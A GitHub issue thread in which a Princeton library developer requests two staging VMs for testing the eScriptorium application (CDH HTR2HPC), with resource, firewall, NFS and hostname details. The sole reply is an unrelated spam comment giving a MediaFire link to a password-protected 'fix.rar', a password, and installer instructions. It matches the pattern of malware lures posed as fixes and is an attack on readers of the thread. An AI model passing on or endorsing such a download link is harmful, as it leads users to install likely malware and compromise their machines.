### ISSUE TITLE
Request new staging VMs for CDH HTR2HPC project

### ISSUE THREAD

**Issue by rlskoeser** [pulibrary/princeton_ansible#5299]
### Describe the VM(s) you need

Two staging VMs for testing out deploy and installation of the eScriptorium application.

If you do not know the answers to some of these questions, that's okay. Please add the information you do have, and we will work together to gather any other information we need. You can also look at the [documentation](https://github.com/pulibrary/pul-it-handbook/blob/main/services/new_vms_for_devs.md) in pul-it-handbook.

#### Which project are these VMs for?
- [x] Project:  CDH HTR2HPC - testing out eScriptorium software 

#### How many VMs do you need?
- [x] Number of VMs: 2

#### What should the FQDN(s) be? (for example, our-new-project-staging1.princeton.edu):
- [x] FQDN:  test-htr.princeton.edu (🤔❓ )

This is a temporary installation to test out the deploy and determine what would be needed for this application to be supported at Princeton in an ongoing basis. As such, I think it's simpler to leave the `.cdh.` out of the hostname in this case (since you can't use the automated form to request them).

#### What virtual resources does each VM need?
- [x] Number of CPUs per VM: (2 CPUS)
- [x] Amount of memory per VM (in 16 GB):
- [x] Amount of storage/disk space per VM (in 30 GB):

Not sure about this but inclined to start small. Our goal is to split out the web application from the high performance computing needs, and this instance will only be used by a small set of beta testers.  Whatever you typically deploy for CDH web applications should be plenty to start with.

#### What firewall changes should be made? (for example, port 22 for SSH, etc.)
- [x] allow access via ssh port 22 from princeton VPN 
- [x] port 80 accessible to load balancer
- [x] access to postgres server
- [x] access to redis 
- [ ] access to mail server ? (need to be able to send mail)

I think the standard setup should work for now; are any firewall changes needed for internal library services? We will want to configure the application to access postgres, redis, and be able to send email.  We will need to figure out how to connect the task runner(s) for this application to Research Computing HPC cluster, but we will follow up when we have specifics about that.

#### What else should we add to each VM? (for example, mount Isilon drives, add NFS server access)
- [x] NFS

We can use the existing CDH section of NFS for this pilot phase. Please add the new VMs to the list of machines that should have access to the CDH staging mount point in PUL NFS.

The application needs to serve out and work on the images to be transcribed, and they will need to be shared by the two VMs.

### Relevant deadlines
- [x] Would like to have these VMs somentime the first week in September: 09/04/2024

### Implementation notes, if any

Proposed VM names cdh-test-htr1.lib.princeton.edu and cdh-test-htr2.lib.princeton.edu

When we discussed this, Alicia recommended putting the new VMs in the lib domain

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
